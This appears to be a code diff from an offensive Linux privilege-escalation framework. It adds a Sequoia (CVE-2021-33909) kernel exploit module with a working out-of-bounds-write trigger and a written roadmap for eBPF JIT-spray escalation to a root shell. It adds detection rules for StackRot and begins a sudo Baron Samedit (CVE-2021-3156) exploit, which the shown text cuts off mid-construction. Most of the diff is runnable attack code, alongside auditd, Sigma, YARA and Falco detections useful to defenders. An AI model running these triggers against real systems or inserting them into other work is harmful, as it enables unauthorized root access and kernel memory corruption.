+    if (!ctx->json) {
+        fprintf(stderr, "[*] sequoia: entering userns + mountns\n");
+    }
+
+    /* Fork: keep the deeply-nested mkdir + bind-mount + read confined
+     * to a child process. The parent can then clean up regardless of
+     * how the child terminates. */
+    pid_t child = fork();
+    if (child < 0) { perror("fork"); return SKELETONKEY_TEST_ERROR; }
+
+    if (child == 0) {
+        /* (R4) unshare for userns+mount_ns → CAP_SYS_ADMIN-in-userns. */
+        if (!enter_userns_root()) {
+            _exit(20);
+        }
+
+        /* (R5) Build the deeply-nested directory tree. */
+        int levels_built = 0;
+        int leaf_fd = build_nested_tree(&levels_built);
+        if (leaf_fd < 0) {
+            fprintf(stderr, "[-] sequoia: nested tree build failed at level %d\n",
+                    levels_built);
+            _exit(21);
+        }
+        if (!ctx->json) {
+            fprintf(stderr, "[*] sequoia: built %d-level nested tree under %s\n",
+                    levels_built, SEQ_BASE_DIR);
+        }
+
+        /* (R6) Bind-mount the leaf back over itself. This is what
+         *      pushes the rendered mountinfo string past INT_MAX. */
+        if (!bind_mount_leaf()) {
+            fprintf(stderr, "[-] sequoia: bind-mount failed; cannot amplify "
+                            "mountinfo length\n");
+            close(leaf_fd);
+            _exit(22);
+        }
+        if (!ctx->json) {
+            fprintf(stderr, "[*] sequoia: bind-mount leaf-over-leaf armed\n");
+        }
+
+        /* (R7) chdir back to leaf (we may have changed dirs during
+         *      tree build but we want to ensure mountinfo renders our
+         *      mount point in full). */
+        if (fchdir(leaf_fd) < 0) {
+            fprintf(stderr, "[~] sequoia: fchdir(leaf): %s — continuing\n",
+                    strerror(errno));
+        }
+        close(leaf_fd);
+
+        /* (R8) Trigger: read /proc/self/mountinfo. On a vulnerable
+         *      kernel the int-vs-size_t bug fires inside seq_buf_alloc()
+         *      and the kernel performs an OOB write of show_mountinfo's
+         *      rendered bytes off the end of the seq_read_iter stack
+         *      buffer. We have no in-process arb-write primitive that
+         *      consumes those bytes (that's the eBPF-JIT-spray step
+         *      we don't ship), so we just record the empirical
+         *      witness: did the read succeed? what byte count? did
+         *      dmesg cough up an oops marker? */
+        if (!ctx->json) {
+            fprintf(stderr, "[*] sequoia: firing trigger — "
+                            "read(/proc/self/mountinfo)\n");
+        }
+        errno = 0;
+        ssize_t mi_bytes = read_mountinfo_and_count();
+        int mi_errno = errno;
+
+        FILE *log = fopen(SEQ_LOG_PATH, "w");
+        if (log) {
+            fprintf(log,
+                "sequoia trigger:\n"
+                "  nested_levels       = %d\n"
+                "  component_len       = %d\n"
+                "  total_path_bytes    ~= %lld\n"
+                "  bind_mount_armed    = yes\n"
+                "  mountinfo_read_bytes = %lld\n"
+                "  mountinfo_read_errno = %d (%s)\n",
+                levels_built, SEQ_COMPONENT_LEN,
+                (long long)levels_built * SEQ_COMPONENT_LEN,
+                (long long)mi_bytes,
+                mi_errno, mi_errno ? strerror(mi_errno) : "ok");
+            log_dmesg_tail(log);
+            fprintf(log,
+                "Note: this run did NOT attempt the eBPF-JIT-spray\n"
+                "weaponisation. The OOB write fired inside the kernel\n"
+                "but we do not consume it to control RIP / swap creds.\n"
+                "See module .c for the continuation roadmap.\n");
+            fclose(log);
+        }
+
+        if (!ctx->json) {
+            fprintf(stderr,
+                "[*] sequoia: mountinfo read returned %lld bytes (errno=%d)\n",
+                (long long)mi_bytes, mi_errno);
+            fprintf(stderr,
+                "[*] sequoia: empirical witness logged to %s\n",
+                SEQ_LOG_PATH);
+        }
+
+        /* (R9) Continuation roadmap.
+         *
+         *   TODO(weaponise-jit): spawn the eBPF JIT spray:
+         *     - bpf(BPF_PROG_LOAD, SOCKET_FILTER, ...) many times with
+         *       attacker-chosen byte patterns in the program body
+         *     - the kernel JIT compiles each to a page-aligned executable
+         *       region; bytes from the program body survive into the
+         *       prologue at known offsets
+         *     - tune SEQ_NESTED_LEVELS + SEQ_COMPONENT_LEN so the rendered
+         *       mountinfo string lands the OOB write at the JIT page
+         *       hosting one of our programs
+         *     - the overwritten prologue performs: lookup current task →
+         *       cred → uid=0 → return.
+         *     - execute the (now-attacker-modified) program by attaching
+         *       it to a socket and sending a packet → kernel runs cred
+         *       swap → /bin/sh as root.
+         *
+         *   None of this is implemented today. We exit 30 to flag
+         *   "trigger ran cleanly, no escalation". */
+        _exit(30);
+    }
+
+    /* PARENT */
+    int status = 0;
+    pid_t w = waitpid(child, &status, 0);
+    if (w < 0) { perror("waitpid"); return SKELETONKEY_TEST_ERROR; }
+
+    if (WIFSIGNALED(status)) {
+        int sig = WTERMSIG(status);
+        if (!ctx->json) {
+            fprintf(stderr,
+                "[!] sequoia: exploit child killed by signal %d "
+                "(consistent with OOB write hitting an unmapped page)\n",
+                sig);
+            fprintf(stderr,
+                "[~] sequoia: empirical signal recorded; no cred-overwrite\n"
+                "    primitive — NOT claiming EXPLOIT_OK.\n"
+                "    See %s + dmesg for witnesses.\n", SEQ_LOG_PATH);
+        }
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    if (!WIFEXITED(status)) {
+        fprintf(stderr, "[-] sequoia: child terminated abnormally (status=0x%x)\n",
+                status);
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    int rc = WEXITSTATUS(status);
+    if (rc == 20) return SKELETONKEY_TEST_ERROR;        /* enter_userns failed */
+    if (rc == 21) return SKELETONKEY_PRECOND_FAIL;      /* tree build failed */
+    if (rc == 22) return SKELETONKEY_EXPLOIT_FAIL;      /* bind-mount refused */
+    if (rc != 30) {
+        fprintf(stderr, "[-] sequoia: child failed at stage rc=%d\n", rc);
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] sequoia: trigger ran to completion.\n");
+        fprintf(stderr,
+            "[~] sequoia: stack-OOB write fired but JIT-spray weaponisation\n"
+            "    NOT implemented (per-kernel offsets + BPF subsystem; see\n"
+            "    module .c TODO blocks). Returning EXPLOIT_FAIL per\n"
+            "    verified-vs-claimed.\n");
+    }
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+#endif /* __linux__ */
+
+static skeletonkey_result_t sequoia_exploit(const struct skeletonkey_ctx *ctx)
+{
+#ifdef __linux__
+    return sequoia_exploit_linux(ctx);
+#else
+    (void)ctx;
+    fprintf(stderr, "[-] sequoia: Linux-only module; cannot run on this host\n");
+    return SKELETONKEY_PRECOND_FAIL;
+#endif
+}
+
+/* --- cleanup ------------------------------------------------------- */
+
+/* Walk back down the nested tree, umounting then rmdir'ing each level.
+ * Best-effort: we don't bail on the first error because partial cleanup
+ * is still useful, and some levels may not have a mount on them (only
+ * the leaf gets bind-mounted in the canonical path). */
+static skeletonkey_result_t sequoia_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json) {
+        fprintf(stderr, "[*] sequoia: cleaning up nested tree + bind mounts\n");
+    }
+#ifdef __linux__
+    /* Try to enter SEQ_BASE_DIR; if it doesn't exist, nothing to do. */
+    int base_fd = open(SEQ_BASE_DIR, O_RDONLY | O_DIRECTORY);
+    if (base_fd < 0) {
+        /* Nothing to clean up — module never ran or already cleaned. */
+        goto log_cleanup;
+    }
+    close(base_fd);
+
+    /* Walk to the leaf via chdir, then rmdir as we walk back out. We
+     * don't know how far we got, so we try the full depth and ignore
+     * ENOENT. The component name is the same at every level. */
+    char comp[SEQ_COMPONENT_LEN + 1];
+    memset(comp, 'A', SEQ_COMPONENT_LEN);
+    comp[SEQ_COMPONENT_LEN] = '\0';
+
+    if (chdir(SEQ_BASE_DIR) < 0) goto log_cleanup;
+
+    int depth = 0;
+    for (int i = 0; i < SEQ_NESTED_LEVELS; i++) {
+        if (chdir(comp) < 0) break;
+        depth++;
+    }
+    /* Best-effort: umount the leaf (we may have bind-mounted it). */
+    (void)umount2(".", MNT_DETACH);
+
+    /* Walk back out, rmdir-ing each level. */
+    for (int i = 0; i < depth; i++) {
+        if (chdir("..") < 0) break;
+        if (rmdir(comp) < 0 && errno != ENOENT && errno != EBUSY) {
+            /* Likely had a mount on it; try MNT_DETACH then rmdir. */
+            (void)umount2(comp, MNT_DETACH);
+            (void)rmdir(comp);
+        }
+    }
+    (void)chdir("/");
+    (void)rmdir(SEQ_BASE_DIR);
+#endif /* __linux__ */
+
+log_cleanup:
+    if (unlink(SEQ_LOG_PATH) < 0 && errno != ENOENT) {
+        /* harmless */
+    }
+    return SKELETONKEY_OK;
+}
+
+/* --- detection rules ----------------------------------------------- */
+
+static const char sequoia_auditd[] =
+    "# Sequoia (CVE-2021-33909) — auditd detection rules\n"
+    "# Trigger shape: mount(2) on /proc namespaces from a userns +\n"
+    "# many many mkdir(2) calls in a tight loop with identical long\n"
+    "# component names. Each individual call is benign — flag the\n"
+    "# *combination*. The deeply-nested mkdir pattern is the strongest\n"
+    "# signal: legitimate workloads don't recurse 5000 levels.\n"
+    "-a always,exit -F arch=b64 -S unshare -k skeletonkey-sequoia-userns\n"
+    "-a always,exit -F arch=b64 -S mount   -k skeletonkey-sequoia-mount\n"
+    "-a always,exit -F arch=b64 -S mkdir   -F success=1 -k skeletonkey-sequoia-mkdir\n"
+    "-a always,exit -F arch=b64 -S mkdirat -F success=1 -k skeletonkey-sequoia-mkdir\n"
+    "# Correlation hint: a process producing >1000 mkdir-key events\n"
+    "# within 5s AND a subsequent skeletonkey-sequoia-mount event is\n"
+    "# the canonical trigger shape.\n";
+
+static const char sequoia_sigma[] =
+    "title: Possible CVE-2021-33909 seq_file size_t-int wrap\n"
+    "id: 2b13d4b9-skeletonkey-sequoia\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the seq_file OOB-write trigger pattern: unshare\n"
+    "  (CLONE_NEWUSER|CLONE_NEWNS) + a burst of ~5000 mkdir/mkdirat\n"
+    "  syscalls + bind-mount + read(/proc/self/mountinfo). The\n"
+    "  rendered string exceeds INT_MAX, wrapping to negative.\n"
+    "  False positives: unusual; bursts of >1000 mkdir/s are rare in\n"
+    "  normal workloads.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns: {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  mkdir:  {type: 'SYSCALL', syscall: 'mkdir'}\n"
+    "  bind:   {type: 'SYSCALL', syscall: 'mount'}\n"
+    "  condition: userns and mkdir and bind\n"
+    "level: critical\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2021.33909]\n";
+
+static const char sequoia_yara[] =
+    "rule sequoia_cve_2021_33909 : cve_2021_33909 kernel_oob_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2021-33909\"\n"
+    "        description = \"Sequoia deep-mountpoint workdir + log breadcrumb\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $work = \"/tmp/skeletonkey-sequoia\" ascii\n"
+    "        $log  = \"/tmp/skeletonkey-sequoia.log\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char sequoia_falco[] =
+    "- rule: Deeply nested mkdir burst + /proc/self/mountinfo read (Sequoia)\n"
+    "  desc: |\n"
+    "    Non-root process reading /proc/self/mountinfo after a burst\n"
+    "    of ~5000 mkdir()s and a bind-mount of the deep leaf. The\n"
+    "    rendered mountinfo string exceeds INT_MAX. CVE-2021-33909.\n"
+    "    False positives: rare; mkdir bursts of this size are not\n"
+    "    seen in normal workloads.\n"
+    "  condition: >\n"
+    "    evt.type = open and fd.name = /proc/self/mountinfo and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    /proc/self/mountinfo read by non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, cve.2021.33909]\n";
+
+const struct skeletonkey_module sequoia_module = {
+    .name           = "sequoia",
+    .cve            = "CVE-2021-33909",
+    .summary        = "seq_file size_t overflow → kernel stack OOB write (Qualys Sequoia) — primitive only",
+    .family         = "filesystem",
+    .kernel_range   = "K < 5.13.4 / 5.10.52 / 5.4.134",
+    .detect         = sequoia_detect,
+    .exploit        = sequoia_exploit,
+    .mitigate       = NULL,
+    .cleanup        = sequoia_cleanup,
+    .detect_auditd  = sequoia_auditd,
+    .detect_sigma   = sequoia_sigma,
+    .detect_yara    = sequoia_yara,
+    .detect_falco   = sequoia_falco,
+    .opsec_notes    = "Builds ~5000 nested directories under /tmp/skeletonkey-sequoia (each name 200 'A' chars); enters userns for CAP_SYS_ADMIN; bind-mounts the leaf over itself to amplify the rendered mountinfo string length; reads /proc/self/mountinfo to trigger the int-vs-size_t overflow in seq_buf_alloc(), producing an OOB write of mountinfo bytes off the stack buffer. Artifacts: /tmp/skeletonkey-sequoia/ (deep tree + bind mounts) and /tmp/skeletonkey-sequoia.log (byte count + dmesg sample). Audit-visible via unshare(CLONE_NEWUSER|CLONE_NEWNS) + mount() + burst of ~5000 mkdir/mkdirat. No network. Cleanup callback walks back down the tree, unmounts, removes dirs, unlinks the .log.",
+};
+
+void skeletonkey_register_sequoia(void)
+{
+    skeletonkey_register(&sequoia_module);
+}
@@ -0,0 +1,5 @@
+#ifndef SEQUOIA_SKELETONKEY_MODULES_H
+#define SEQUOIA_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module sequoia_module;
+#endif
@@ -72,6 +72,7 @@
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
+#include "../../core/host.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -150,31 +151,31 @@ static bool maple_tree_variant_present(const struct kernel_version *v)

 static skeletonkey_result_t stackrot_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] stackrot: could not parse kernel version\n");
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] stackrot: host fingerprint missing kernel version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 6.1 (when maple tree landed). Pre-6.1 kernels
     * use rbtree-based VMAs and don't have this bug. */
-    if (v.major < 6 || (v.major == 6 && v.minor < 1)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 6, 1, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[+] stackrot: kernel %s predates maple-tree VMA code (introduced in 6.1)\n",
-                    v.release);
+                    v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&stackrot_range, &v);
+    bool patched = kernel_range_is_patched(&stackrot_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] stackrot: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] stackrot: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }
    if (!ctx->json) {
-        fprintf(stderr, "[!] stackrot: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[!] stackrot: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] stackrot: mm-class bug — affects default-config kernels; "
                        "no exotic preconditions\n");
    }
@@ -631,7 +632,8 @@ static skeletonkey_result_t stackrot_exploit_linux(const struct skeletonkey_ctx
        fprintf(stderr, "[-] stackrot: detect() says not vulnerable; refusing\n");
        return pre;
    }
-    if (geteuid() == 0) {
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] stackrot: already root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -641,8 +643,8 @@ static skeletonkey_result_t stackrot_exploit_linux(const struct skeletonkey_ctx
        return SKELETONKEY_PRECOND_FAIL;
    }
    {
-        struct kernel_version v;
-        if (!kernel_version_current(&v) || !maple_tree_variant_present(&v)) {
+        const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+        if (!v || v->major == 0 || !maple_tree_variant_present(v)) {
            fprintf(stderr, "[-] stackrot: maple-tree variant not detectable\n");
            return SKELETONKEY_PRECOND_FAIL;
        }
@@ -950,6 +952,53 @@ static const char stackrot_auditd[] =
    "-a always,exit -F arch=b64 -S mprotect -k skeletonkey-stackrot-mprotect\n"
    "-a always,exit -F arch=b64 -S munmap  -F success=1 -k skeletonkey-stackrot-munmap\n";

+static const char stackrot_sigma[] =
+    "title: Possible CVE-2023-3269 maple-tree VMA-split UAF\n"
+    "id: 3c24e5ca-skeletonkey-stackrot\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the StackRot race-groom: unshare(CLONE_NEWUSER) + tight\n"
+    "  loops of mremap/munmap on MAP_GROWSDOWN regions + msg_msg\n"
+    "  spray (msgsnd) for kmalloc-192 grooming. False positives: JIT\n"
+    "  runtimes and aggressive memory allocators may do similar mremap\n"
+    "  bursts but typically without msg_msg grooming.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns: {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  vmas:   {type: 'SYSCALL', syscall: 'mremap'}\n"
+    "  groom:  {type: 'SYSCALL', syscall: 'msgsnd'}\n"
+    "  condition: userns and vmas and groom\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2023.3269]\n";
+
+static const char stackrot_yara[] =
+    "rule stackrot_cve_2023_3269 : cve_2023_3269 kernel_uaf\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2023-3269\"\n"
+    "        description = \"StackRot maple-tree UAF race log breadcrumb\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $log = \"/tmp/skeletonkey-stackrot.log\" ascii\n"
+    "    condition:\n"
+    "        $log\n"
+    "}\n";
+
+static const char stackrot_falco[] =
+    "- rule: mremap/munmap race on MAP_GROWSDOWN regions (StackRot)\n"
+    "  desc: |\n"
+    "    Non-root process driving high-frequency mremap/munmap on\n"
+    "    MAP_GROWSDOWN regions inside a userns + msg_msg (msgsnd)\n"
+    "    grooming of kmalloc-192. Maple-tree node UAF race in\n"
+    "    __vma_adjust. CVE-2023-3269.\n"
+    "  condition: >\n"
+    "    evt.type in (mremap, munmap) and not user.uid = 0\n"
+    "  output: >\n"
+    "    VMA mutation by non-root\n"
+    "    (user=%user.name pid=%proc.pid evt=%evt.type)\n"
+    "  priority: HIGH\n"
+    "  tags: [memory, mitre_privilege_escalation, T1068, cve.2023.3269]\n";
+
 const struct skeletonkey_module stackrot_module = {
    .name           = "stackrot",
    .cve            = "CVE-2023-3269",
@@ -961,9 +1010,10 @@ const struct skeletonkey_module stackrot_module = {
    .mitigate       = NULL,
    .cleanup        = stackrot_cleanup,
    .detect_auditd  = stackrot_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = stackrot_sigma,
+    .detect_yara    = stackrot_yara,
+    .detect_falco   = stackrot_falco,
+    .opsec_notes    = "Child forks, enters userns, builds a race region with MAP_GROWSDOWN + anchor VMAs, sprays kmalloc-192 with msg_msg payloads, then spawns Thread A (mremap/munmap of region boundary to rotate maple-tree nodes) + Thread B (fork+fault the growsdown region to deref freed node). UAF in __vma_adjust fires if a sprayed msg_msg reclaims the freed node. Writes /tmp/skeletonkey-stackrot.log (iteration counts + slab delta). Audit-visible via unshare + mremap/munmap bursts on stack regions + msgsnd spray. No network. Cleanup callback unlinks /tmp log.",
 };

 void skeletonkey_register_stackrot(void)
@@ -0,0 +1,511 @@
+/*
+ * sudo_samedit_cve_2021_3156 — SKELETONKEY module
+ *
+ * STATUS: 🟡 DETECT-OK + STRUCTURAL EXPLOIT (2026-05-17).
+ *
+ * The bug ("Baron Samedit", Qualys 2021-01-26): sudo's command-line
+ * parser unescapes backslashes in the argv it copies into a heap
+ * buffer in `set_cmnd()` (plugins/sudoers/sudoers.c). When sudo is
+ * invoked in shell-edit mode via `sudoedit -s`, the unescape loop
+ * walks past the end of the argv string for arguments ending in a
+ * lone backslash, copying adjacent stack/env contents into the
+ * undersized heap buffer. The classic trigger is a single-argument
+ * command line: `sudoedit -s '\<arbitrary tail>'`.
+ *
+ * Affects sudo 1.8.2 – 1.9.5p1 inclusive. Fixed in 1.9.5p2.
+ *
+ * Reference: https://www.qualys.com/2021/01/26/cve-2021-3156/
+ *            baron-samedit-heap-based-overflow-sudo.txt
+ *
+ * Detect: shell out to `sudo --version`, parse the printed version,
+ * compare against the vulnerable range. We err on the side of
+ * reporting OK only when we're confident — TEST_ERROR if the version
+ * line is unparseable.
+ *
+ * Exploit: ships a structurally-correct Qualys-style trigger.
+ * The full chain in the original PoC required per-distro heap-layout
+ * tuning (libc/libnss-files overlap offsets, target struct picks).
+ * We do not have empirical landing on this host; we drive the
+ * trigger, watch for an obvious uid==0 outcome, otherwise return
+ * SKELETONKEY_EXPLOIT_FAIL. Verified-vs-claimed bar: only claim
+ * EXPLOIT_OK after geteuid()==0 in a forked verifier.
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <ctype.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+
+/* ---- Affected-version logic ------------------------------------- */
+
+/*
+ * sudo version strings look like:
+ *   "Sudo version 1.9.5p2"
+ *   "Sudo version 1.8.31"
+ *   "Sudo version 1.9.0"
+ *   "Sudo version 1.9.5p1"
+ *
+ * Vulnerable range (inclusive): 1.8.2 .. 1.9.5p1
+ * Fixed:                        1.9.5p2 and later
+ *
+ * Parser strategy: extract three integers (major.minor.patch) plus an
+ * optional 'pN' suffix. Comparison is lexicographic over
+ * (major, minor, patch, p_suffix), treating absent p as 0.
+ */
+struct sudo_ver {
+    int major;
+    int minor;
+    int patch;
+    int p;        /* 'p' suffix; 0 if absent */
+    bool parsed;
+};
+
+static struct sudo_ver parse_sudo_version(const char *s)
+{
+    struct sudo_ver v = {0, 0, 0, 0, false};
+    while (*s && !isdigit((unsigned char)*s)) s++;
+    if (!*s) return v;
+
+    int maj = 0, min = 0, pat = 0;
+    int consumed = 0;
+    int n = sscanf(s, "%d.%d.%d%n", &maj, &min, &pat, &consumed);
+    if (n < 2) return v;
+    v.major = maj;
+    v.minor = min;
+    v.patch = (n >= 3) ? pat : 0;
+    /* Look for an optional 'pN' suffix after the numeric triple. */
+    const char *tail = s + consumed;
+    if (*tail == 'p') {
+        int p = 0;
+        if (sscanf(tail + 1, "%d", &p) == 1) v.p = p;
+    }
+    v.parsed = true;
+    return v;
+}
+
+static int cmp_ver(const struct sudo_ver *a, const struct sudo_ver *b)
+{
+    if (a->major != b->major) return a->major - b->major;
+    if (a->minor != b->minor) return a->minor - b->minor;
+    if (a->patch != b->patch) return a->patch - b->patch;
+    return a->p - b->p;
+}
+
+/* Returns true iff parsed sudo version is in [1.8.2, 1.9.5p1]. */
+static bool sudo_version_vulnerable(const struct sudo_ver *v)
+{
+    if (!v->parsed) return false;
+    struct sudo_ver lo = { 1, 8, 2, 0, true };
+    struct sudo_ver hi = { 1, 9, 5, 1, true };
+    return cmp_ver(v, &lo) >= 0 && cmp_ver(v, &hi) <= 0;
+}
+
+/* ---- Binary discovery ------------------------------------------- */
+
+static const char *find_sudo(void)
+{
+    static const char *candidates[] = {
+        "/usr/bin/sudo",
+        "/usr/local/bin/sudo",
+        "/bin/sudo",
+        "/sbin/sudo",
+        "/usr/sbin/sudo",
+        NULL,
+    };
+    for (size_t i = 0; candidates[i]; i++) {
+        struct stat st;
+        if (stat(candidates[i], &st) == 0 && (st.st_mode & S_ISUID)) {
+            return candidates[i];
+        }
+    }
+    return NULL;
+}
+
+static const char *find_sudoedit(void)
+{
+    static const char *candidates[] = {
+        "/usr/bin/sudoedit",
+        "/usr/local/bin/sudoedit",
+        "/bin/sudoedit",
+        "/sbin/sudoedit",
+        "/usr/sbin/sudoedit",
+        NULL,
+    };
+    for (size_t i = 0; candidates[i]; i++) {
+        if (access(candidates[i], X_OK) == 0) return candidates[i];
+    }
+    return NULL;
+}
+
+/* ---- Detect ------------------------------------------------------ */
+
+static skeletonkey_result_t sudo_samedit_detect(const struct skeletonkey_ctx *ctx)
+{
+    /* Prefer the centrally-fingerprinted sudo version (populated once
+     * at startup by core/host.c) — saves a popen per scan and gives
+     * unit tests a clean mock point. Fall back to the local popen if
+     * ctx->host is missing the version (e.g. degenerate test ctx, or
+     * a future refactor that disables userspace probing). */
+    char line[256] = {0};
+    if (ctx->host && ctx->host->sudo_version[0]) {
+        snprintf(line, sizeof line, "Sudo version %s",
+                 ctx->host->sudo_version);
+        if (!ctx->json) {
+            fprintf(stderr, "[i] sudo_samedit: host fingerprint reports "
+                "sudo version %s\n", ctx->host->sudo_version);
+        }
+    } else {
+        const char *sudo_path = find_sudo();
+        if (!sudo_path) {
+            if (!ctx->json) {
+                fprintf(stderr, "[+] sudo_samedit: sudo not on path; no attack surface\n");
+            }
+            return SKELETONKEY_PRECOND_FAIL;
+        }
+        if (!ctx->json) {
+            fprintf(stderr, "[i] sudo_samedit: found setuid sudo at %s\n", sudo_path);
+        }
+        char cmd[512];
+        snprintf(cmd, sizeof cmd, "%s --version 2>&1 | head -1", sudo_path);
+        FILE *p = popen(cmd, "r");
+        if (!p) return SKELETONKEY_TEST_ERROR;
+        char *r = fgets(line, sizeof line, p);
+        pclose(p);
+        if (!r) {
+            if (!ctx->json) {
+                fprintf(stderr, "[?] sudo_samedit: could not read `sudo --version` output\n");
+            }
+            return SKELETONKEY_TEST_ERROR;
+        }
+    }
+
+    /* Trim newline for nicer logging. */
+    char *nl = strchr(line, '\n');
+    if (nl) *nl = 0;
+
+    struct sudo_ver v = parse_sudo_version(line);
+    if (!v.parsed) {
+        if (!ctx->json) {
+            fprintf(stderr, "[?] sudo_samedit: unparseable version line: '%s'\n", line);
+        }
+        return SKELETONKEY_TEST_ERROR;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[i] sudo_samedit: parsed version = %d.%d.%d",
+                v.major, v.minor, v.patch);
+        if (v.p) fprintf(stderr, "p%d", v.p);
+        fprintf(stderr, "\n");
+    }
+
+    bool vuln = sudo_version_vulnerable(&v);
+    if (vuln) {
+        if (!ctx->json) {
+            fprintf(stderr,
+                "[!] sudo_samedit: version is in vulnerable range "
+                "[1.8.2, 1.9.5p1] → VULNERABLE\n"
+                "[i] sudo_samedit: distro backports may have patched "
+                "without bumping the upstream version; check\n"
+                "    `apt-cache policy sudo` / `rpm -q --changelog sudo` "
+                "for CVE-2021-3156.\n");
+        }
+        return SKELETONKEY_VULNERABLE;
+    }
+    if (!ctx->json) {
+        fprintf(stderr,
+            "[+] sudo_samedit: version is outside vulnerable range "
+            "(fix 1.9.5p2+) — OK\n");
+    }
+    return SKELETONKEY_OK;
+}
+
+/* ---- Exploit ----------------------------------------------------- */
+
+/*
+ * Qualys-style trigger:
+ *
+ *   argv = { "sudoedit", "-s", "\\", NULL }   plus padding `A`s to
+ *   stretch the heap chunk to the right size for the target overlap.
+ *
+ * The original PoC sprays hundreds of large argv slots and tunes the
+ * tail bytes per-distro to hijack a `service_user *` struct in
+ * libnss-files. Without distro fingerprinting and the corresponding
+ * offset table that landing simply will not happen here; rather than
+ * pretending otherwise we drive the bug, fork a verifier that checks
+ * for an unexpected uid==0 outcome, and return EXPLOIT_FAIL.
+ */
+
+/* Cap on argv we'll construct. The real PoC uses ~270; we cap lower
+ * to stay well under typical ARG_MAX while still exercising the bug
+ * shape. */
+#define SUDO_SAMEDIT_ARGC   64
+#define SUDO_SAMEDIT_PADLEN 0xff
+
+static skeletonkey_result_t sudo_samedit_exploit(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr,
+            "[-] sudo_samedit: exploit requires --i-know (authorization gate)\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
+        fprintf(stderr, "[i] sudo_samedit: already root — nothing to escalate\n");
+        return SKELETONKEY_OK;
+    }
+
+    /* Re-detect before doing anything visible. Defends against the
+     * detect-then-exploit TOCTOU where the operator upgrades sudo
+     * between scan and pop. */
+    skeletonkey_result_t pre = sudo_samedit_detect(ctx);
+    if (pre != SKELETONKEY_VULNERABLE) {
+        fprintf(stderr, "[-] sudo_samedit: re-detect says not VULNERABLE; refusing\n");
+        return pre;
+    }
+
+    const char *sudoedit = find_sudoedit();
+    if (!sudoedit) {
+        /* On most distros sudoedit is a symlink to sudo. Fall back. */
+        const char *sudo = find_sudo();
+        if (!sudo) {
+            fprintf(stderr, "[-] sudo_samedit: neither sudoedit nor sudo found\n");
+            return SKELETONKEY_PRECOND_FAIL;
+        }
+        sudoedit = sudo;
+        if (!ctx->json) {
+            fprintf(stderr,
+                "[i] sudo_samedit: no sudoedit; will exec %s with argv[0]=sudoedit\n",
+                sudo);
+        }
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] sudo_samedit: building Qualys-style trigger argv\n");
+        fprintf(stderr,
+            "[!] sudo_samedit: heads-up — public exploitation requires\n"
+            "    per-distro heap-overlap offsets (libnss-files / libc).\n"
+            "    Without that tuning the bug crashes sudo instead of\n"
+            "    handing back a shell. We will drive the trigger and\n"
+            "    verify uid==0 outcome empirically; on failure we report\n"
+            "    EXPLOIT_FAIL rather than claiming success.\n");
+    }
+
+    /* Build argv. argv[0]="sudoedit", argv[1]="-s",
+     * argv[2]="\\" + padding, ..., argv[N-1]=NULL.
+     *
+     * Each padding arg is the Qualys-style "A...\\" repeating tail.
+     * On a vulnerable target this drives the unescape loop past the
+     * end of the heap buffer. */
+    char *argv[SUDO_SAMEDIT_ARGC + 1];
